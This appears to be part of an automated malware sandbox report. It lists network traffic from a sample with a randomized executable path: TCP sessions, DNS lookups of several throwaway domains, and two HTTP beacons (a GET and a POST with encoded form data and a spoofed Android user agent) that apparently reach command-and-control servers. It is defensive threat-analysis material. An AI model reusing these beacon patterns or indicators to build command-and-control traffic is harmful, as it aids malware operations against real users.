                                                                                Dec 4, 2024 15:31:55.184544086 CET4984280192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:31:55.304433107 CET8049842172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:31:56.567378044 CET8049842172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:31:56.567980051 CET8049842172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:31:56.568041086 CET4984280192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:31:56.691653013 CET4984280192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:31:57.710269928 CET4984680192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:31:57.834712982 CET8049846172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:31:57.834861994 CET4984680192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:31:57.850023031 CET4984680192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:31:57.969985008 CET8049846172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:31:59.217195988 CET8049846172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:31:59.217674017 CET8049846172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:31:59.217744112 CET4984680192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:31:59.363521099 CET4984680192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:00.388753891 CET4985080192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:00.509994030 CET8049850172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:32:00.510116100 CET4985080192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:00.614108086 CET4985080192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:00.734181881 CET8049850172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:32:00.734206915 CET8049850172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:32:01.964569092 CET8049850172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:32:01.964891911 CET8049850172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:32:01.965195894 CET4985080192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:02.129189968 CET4985080192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:03.161112070 CET4985680192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:03.281177998 CET8049856172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:32:03.281311035 CET4985680192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:03.380013943 CET4985680192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:03.501332045 CET8049856172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:32:04.686894894 CET8049856172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:32:04.687165976 CET8049856172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:32:04.688711882 CET4985680192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:04.689779043 CET4985680192.168.2.7172.67.145.234
                                                                                Dec 4, 2024 15:32:04.813724995 CET8049856172.67.145.234192.168.2.7
                                                                                Dec 4, 2024 15:32:10.448688030 CET4987080192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:10.569163084 CET804987013.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:10.569246054 CET4987080192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:10.584470987 CET4987080192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:10.704140902 CET804987013.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:11.719304085 CET804987013.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:11.719384909 CET4987080192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:12.097950935 CET4987080192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:12.220495939 CET804987013.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:13.116405010 CET4987780192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:13.319576979 CET804987713.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:13.319660902 CET4987780192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:13.334724903 CET4987780192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:13.454551935 CET804987713.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:14.429903030 CET804987713.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:14.430011034 CET4987780192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:14.849252939 CET4987780192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:14.969990015 CET804987713.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:15.866620064 CET4988580192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:15.986413002 CET804988513.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:15.987487078 CET4988580192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:16.003022909 CET4988580192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:16.122796059 CET804988513.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:16.122853041 CET804988513.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:17.161453962 CET804988513.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:17.161520958 CET4988580192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:17.519675970 CET4988580192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:17.657196045 CET804988513.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:18.538361073 CET4989180192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:18.658246040 CET804989113.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:18.658344984 CET4989180192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:18.668330908 CET4989180192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:18.788122892 CET804989113.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:19.810862064 CET804989113.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:19.811610937 CET804989113.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:19.812100887 CET4989180192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:19.814882040 CET4989180192.168.2.713.248.169.48
                                                                                Dec 4, 2024 15:32:19.934492111 CET804989113.248.169.48192.168.2.7
                                                                                Dec 4, 2024 15:32:25.138442039 CET4990780192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:25.258289099 CET804990743.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:25.258385897 CET4990780192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:25.275300026 CET4990780192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:25.395133972 CET804990743.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:26.785301924 CET4990780192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:26.946296930 CET804990743.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:27.803906918 CET4991380192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:27.923963070 CET804991343.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:27.924732924 CET4991380192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:27.940026999 CET4991380192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:28.059931040 CET804991343.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:29.441585064 CET4991380192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:29.606005907 CET804991343.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:30.460408926 CET4991880192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:30.580239058 CET804991843.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:30.580641985 CET4991880192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:30.596649885 CET4991880192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:30.717066050 CET804991843.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:30.717087030 CET804991843.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:32.100645065 CET4991880192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:32.263041019 CET804991843.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:33.116316080 CET4992480192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:33.237512112 CET804992443.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:33.237576962 CET4992480192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:33.249103069 CET4992480192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:33.370592117 CET804992443.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:47.192394018 CET804990743.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:47.192629099 CET4990780192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:49.896435022 CET804991343.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:49.896667957 CET4991380192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:52.520037889 CET804991843.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:52.520112038 CET4991880192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:55.176834106 CET804992443.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:32:55.177167892 CET4992480192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:55.184262991 CET4992480192.168.2.743.199.54.158
                                                                                Dec 4, 2024 15:32:55.304177999 CET804992443.199.54.158192.168.2.7
                                                                                Dec 4, 2024 15:33:01.174741983 CET4998080192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:01.294789076 CET8049980136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:01.296840906 CET4998080192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:01.311480999 CET4998080192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:01.431447983 CET8049980136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:02.636681080 CET8049980136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:02.636749029 CET8049980136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:02.636774063 CET8049980136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:02.636827946 CET4998080192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:02.816751957 CET4998080192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:03.838382959 CET4998580192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:03.958295107 CET8049985136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:03.958380938 CET4998580192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:04.017218113 CET4998580192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:04.137077093 CET8049985136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:05.293071985 CET8049985136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:05.293180943 CET8049985136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:05.293256998 CET4998580192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:05.293319941 CET8049985136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:05.293473005 CET4998580192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:05.535404921 CET4998580192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:06.555986881 CET4998880192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:06.675966024 CET8049988136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:06.676043034 CET4998880192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:06.713494062 CET4998880192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:06.833471060 CET8049988136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:06.833486080 CET8049988136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:07.994160891 CET8049988136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:07.994287014 CET8049988136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:07.994355917 CET4998880192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:08.223074913 CET4998880192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:09.242225885 CET4999180192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:09.362596035 CET8049991136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:09.362831116 CET4999180192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:09.372771978 CET4999180192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:09.492868900 CET8049991136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:10.647532940 CET8049991136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:10.647759914 CET8049991136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:10.647766113 CET8049991136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:10.647912025 CET4999180192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:10.648433924 CET8049991136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:10.648441076 CET8049991136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:10.648457050 CET8049991136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:10.648489952 CET4999180192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:10.648514986 CET4999180192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:10.649502039 CET8049991136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:10.649595022 CET4999180192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:10.653033972 CET4999180192.168.2.7136.143.186.12
                                                                                Dec 4, 2024 15:33:10.772922039 CET8049991136.143.186.12192.168.2.7
                                                                                Dec 4, 2024 15:33:16.005858898 CET4999380192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:16.127479076 CET8049993172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:16.127630949 CET4999380192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:16.198621035 CET4999380192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:16.319015980 CET8049993172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:17.332479954 CET8049993172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:17.333986044 CET8049993172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:17.334057093 CET4999380192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:17.708594084 CET4999380192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:18.754462957 CET4999480192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:18.874979973 CET8049994172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:18.880595922 CET4999480192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:19.075531006 CET4999480192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:19.196145058 CET8049994172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:20.113285065 CET8049994172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:20.113354921 CET8049994172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:20.113464117 CET4999480192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:20.598006010 CET4999480192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:21.630495071 CET4999580192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:21.752063990 CET8049995172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:21.752188921 CET4999580192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:21.847820044 CET4999580192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:21.967916012 CET8049995172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:21.967973948 CET8049995172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:22.907182932 CET8049995172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:22.909018993 CET8049995172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:22.909169912 CET4999580192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:23.363552094 CET4999580192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:24.393820047 CET4999680192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:24.513997078 CET8049996172.67.192.207192.168.2.7
                                                                                Dec 4, 2024 15:33:24.514081955 CET4999680192.168.2.7172.67.192.207
                                                                                Dec 4, 2024 15:33:24.527251959 CET4999680192.168.2.7172.67.192.207
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                Dec 4, 2024 15:34:48.352518082 CET5688553192.168.2.71.1.1.1
                                                                                Dec 4, 2024 15:34:48.887554884 CET53568851.1.1.1192.168.2.7
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 4, 2024 15:31:22.426341057 CET | 192.168.2.7 | 1.1.1.1 | 0x6aa4 | Standard query (0) | www.aextligrwjv.best | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:31:39.367629051 CET | 192.168.2.7 | 1.1.1.1 | 0xdbc9 | Standard query (0) | www.duwixushx.xyz | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:31:54.742553949 CET | 192.168.2.7 | 1.1.1.1 | 0x36f5 | Standard query (0) | www.vayui.top | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:32:09.696635962 CET | 192.168.2.7 | 1.1.1.1 | 0x783f | Standard query (0) | www.remedies.pro | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:32:24.820398092 CET | 192.168.2.7 | 1.1.1.1 | 0x34e8 | Standard query (0) | www.327531.buzz | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:33:00.196146011 CET | 192.168.2.7 | 1.1.1.1 | 0x7ac0 | Standard query (0) | www.everythlngict.org | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:33:15.666418076 CET | 192.168.2.7 | 1.1.1.1 | 0x55b9 | Standard query (0) | www.3kw40881107247y.click | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:33:30.714859009 CET | 192.168.2.7 | 1.1.1.1 | 0x3c83 | Standard query (0) | www.futurorks.xyz | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:33:45.680226088 CET | 192.168.2.7 | 1.1.1.1 | 0xf2c2 | Standard query (0) | www.hwbzfdtn.tokyo | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:33:46.676275969 CET | 192.168.2.7 | 1.1.1.1 | 0xf2c2 | Standard query (0) | www.hwbzfdtn.tokyo | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:34:01.948585987 CET | 192.168.2.7 | 1.1.1.1 | 0x4373 | Standard query (0) | www.129glenforest.com | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:34:17.118254900 CET | 192.168.2.7 | 1.1.1.1 | 0xd7a8 | Standard query (0) | www.dating-ml-es.xyz | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:34:32.430567980 CET | 192.168.2.7 | 1.1.1.1 | 0x8210 | Standard query (0) | www.soainsaat.xyz | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:34:33.426485062 CET | 192.168.2.7 | 1.1.1.1 | 0x8210 | Standard query (0) | www.soainsaat.xyz | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:34:48.352518082 CET | 192.168.2.7 | 1.1.1.1 | 0xda0e | Standard query (0) | www.nicolemichelle.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 4, 2024 15:31:22.925955057 CET | 1.1.1.1 | 192.168.2.7 | 0x6aa4 | No error (0) | www.aextligrwjv.best | | 172.67.185.6 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:31:22.925955057 CET | 1.1.1.1 | 192.168.2.7 | 0x6aa4 | No error (0) | www.aextligrwjv.best | | 104.21.84.22 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:31:39.925683022 CET | 1.1.1.1 | 192.168.2.7 | 0xdbc9 | No error (0) | www.duwixushx.xyz | | 156.251.17.224 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:31:55.045418024 CET | 1.1.1.1 | 192.168.2.7 | 0x36f5 | No error (0) | www.vayui.top | | 172.67.145.234 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:31:55.045418024 CET | 1.1.1.1 | 192.168.2.7 | 0x36f5 | No error (0) | www.vayui.top | | 104.21.95.160 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:32:10.446192980 CET | 1.1.1.1 | 192.168.2.7 | 0x783f | No error (0) | www.remedies.pro | | 13.248.169.48 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:32:10.446192980 CET | 1.1.1.1 | 192.168.2.7 | 0x783f | No error (0) | www.remedies.pro | | 76.223.54.146 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:32:25.135519028 CET | 1.1.1.1 | 192.168.2.7 | 0x34e8 | No error (0) | www.327531.buzz | | 43.199.54.158 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:33:01.172326088 CET | 1.1.1.1 | 192.168.2.7 | 0x7ac0 | No error (0) | www.everythlngict.org | zhs.zohosites.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 4, 2024 15:33:01.172326088 CET | 1.1.1.1 | 192.168.2.7 | 0x7ac0 | No error (0) | zhs.zohosites.com | | 136.143.186.12 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:33:16.000905991 CET | 1.1.1.1 | 192.168.2.7 | 0x55b9 | No error (0) | www.3kw40881107247y.click | | 172.67.192.207 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:33:16.000905991 CET | 1.1.1.1 | 192.168.2.7 | 0x55b9 | No error (0) | www.3kw40881107247y.click | | 104.21.44.16 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:33:31.207896948 CET | 1.1.1.1 | 192.168.2.7 | 0x3c83 | No error (0) | www.futurorks.xyz | | 203.161.43.228 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:33:47.227288008 CET | 1.1.1.1 | 192.168.2.7 | 0xf2c2 | No error (0) | www.hwbzfdtn.tokyo | benteng01.cn | | CNAME (Canonical name) | IN (0x0001) | false
Dec 4, 2024 15:33:47.227288008 CET | 1.1.1.1 | 192.168.2.7 | 0xf2c2 | No error (0) | benteng01.cn | | 8.223.59.213 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:33:47.227298021 CET | 1.1.1.1 | 192.168.2.7 | 0xf2c2 | No error (0) | www.hwbzfdtn.tokyo | benteng01.cn | | CNAME (Canonical name) | IN (0x0001) | false
Dec 4, 2024 15:33:47.227298021 CET | 1.1.1.1 | 192.168.2.7 | 0xf2c2 | No error (0) | benteng01.cn | | 8.223.59.213 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:34:02.484493971 CET | 1.1.1.1 | 192.168.2.7 | 0x4373 | No error (0) | www.129glenforest.com | domains-38.cribflyer.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 4, 2024 15:34:02.484493971 CET | 1.1.1.1 | 192.168.2.7 | 0x4373 | No error (0) | domains-38.cribflyer.com | | 54.176.168.58 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:34:02.484493971 CET | 1.1.1.1 | 192.168.2.7 | 0x4373 | No error (0) | domains-38.cribflyer.com | | 52.52.120.92 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:34:17.852608919 CET | 1.1.1.1 | 192.168.2.7 | 0xd7a8 | No error (0) | www.dating-ml-es.xyz | | 199.59.243.227 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:34:33.537363052 CET | 1.1.1.1 | 192.168.2.7 | 0x8210 | No error (0) | www.soainsaat.xyz | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 4, 2024 15:34:33.537363052 CET | 1.1.1.1 | 192.168.2.7 | 0x8210 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 4, 2024 15:34:33.537363052 CET | 1.1.1.1 | 192.168.2.7 | 0x8210 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:34:33.570251942 CET | 1.1.1.1 | 192.168.2.7 | 0x8210 | No error (0) | www.soainsaat.xyz | redirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 4, 2024 15:34:33.570251942 CET | 1.1.1.1 | 192.168.2.7 | 0x8210 | No error (0) | redirect.natrocdn.com | natroredirect.natrocdn.com | | CNAME (Canonical name) | IN (0x0001) | false
Dec 4, 2024 15:34:33.570251942 CET | 1.1.1.1 | 192.168.2.7 | 0x8210 | No error (0) | natroredirect.natrocdn.com | | 85.159.66.93 | A (IP address) | IN (0x0001) | false
Dec 4, 2024 15:34:48.887554884 CET | 1.1.1.1 | 192.168.2.7 | 0xda0e | No error (0) | www.nicolemichelle.net | | 38.63.190.200 | A (IP address) | IN (0x0001) | false
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.7 | 49771 | 172.67.185.6 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:31:23.063009024 CET | 494 | OUT | GET /msiy/?9hy=gvrDS8U8OP&GhEtuH=vWnR7wTg66d2ddFO/hOe3tyOuhU6gKBnFLqMp8Vj889T3d63TkYAebsAkWFQIzapGgDNCMxKcgjSNeLYtFe43HwIPdM+jeFQKV7h03gcmWP5dRjf9VfH50dWMQ/EONfHOgL151a+js8J HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Host: www.aextligrwjv.best
Connection: close
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Dec 4, 2024 15:31:24.306360006 CET | 847 | IN | HTTP/1.1 404 Not Found
Date: Wed, 04 Dec 2024 14:31:24 GMT
Content-Type: text/plain; charset=utf-8
Content-Length: 19
Connection: close
X-Content-Type-Options: nosniff
CF-Cache-Status: DYNAMIC
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=H9J%2Boy8JtxLUib5LByq8EBXSF4xiTD1UQfqkgnzkcB%2FBEo0n0CPB8pX7ZjQUXNlN7dBlXS4wVS5hCdzyZPP8IOxGV%2Bvf%2BvzcIBs10Pw0ppc7fIwMxVqyQk%2Fl3LZYvCGadCR6Ij6%2BQw%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Server: cloudflare
CF-RAY: 8ecc7ff79bde42e4-EWR
alt-svc: h3=":443"; ma=86400
server-timing: cfL4;desc="?proto=TCP&rtt=13055&min_rtt=13055&rtt_var=6527&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=494&delivery_rate=0&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
Data Ascii: 404 page not found


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.7 | 49804 | 156.251.17.224 | 80 | 7000 | C:\Program Files (x86)\nKYkNaBUuvYpEblkgBFeBoxkBdtJJcMByicKuslhjIGiYOjTwZLBSDCwuLzDWOVtprrjBvghLAnJBXT\RlKZsaoEJNpD.exe
Timestamp | Bytes transferred | Direction | Data
Dec 4, 2024 15:31:40.076833963 CET | 750 | OUT | POST /fyc8/ HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.5
Host: www.duwixushx.xyz
Origin: http://www.duwixushx.xyz
Content-Length: 219
Cache-Control: no-cache
Connection: close
Content-Type: application/x-www-form-urlencoded
Referer: http://www.duwixushx.xyz/fyc8/
User-Agent: Mozilla/5.0 (Linux; U; Android 4.3; en-us; MT2L03 Build/HuaweiMT2L03) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Data Ascii: GhEtuH=woGE44KVe1zz2sJsJDy1RWgxMfo1p5kPjJhIYVzvM8S4udMwoXYrv7+MuTa6mhmNIrR9eXP+4pEpmip0kdjDlOZUjwQlkT2KDBokGXJ9JEiBVJ+9TUDYMIIb4/QmM8uPAaeSzEgSDex+okqyh1uhJkNRXI6AXnZS5L6BCmUlMTwnSeaxfIEmpjv5/IkmlvAkeZgNiRzVQz9ZJ83Pgw==
Dec 4, 2024 15:31:41.672455072 CET | 289 | IN | HTTP/1.1 404 Not Found
Server: nginx
Date: Wed, 04 Dec 2024 14:31:41 GMT
Content-Type: text/html
Content-Length: 146
Connection: close
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
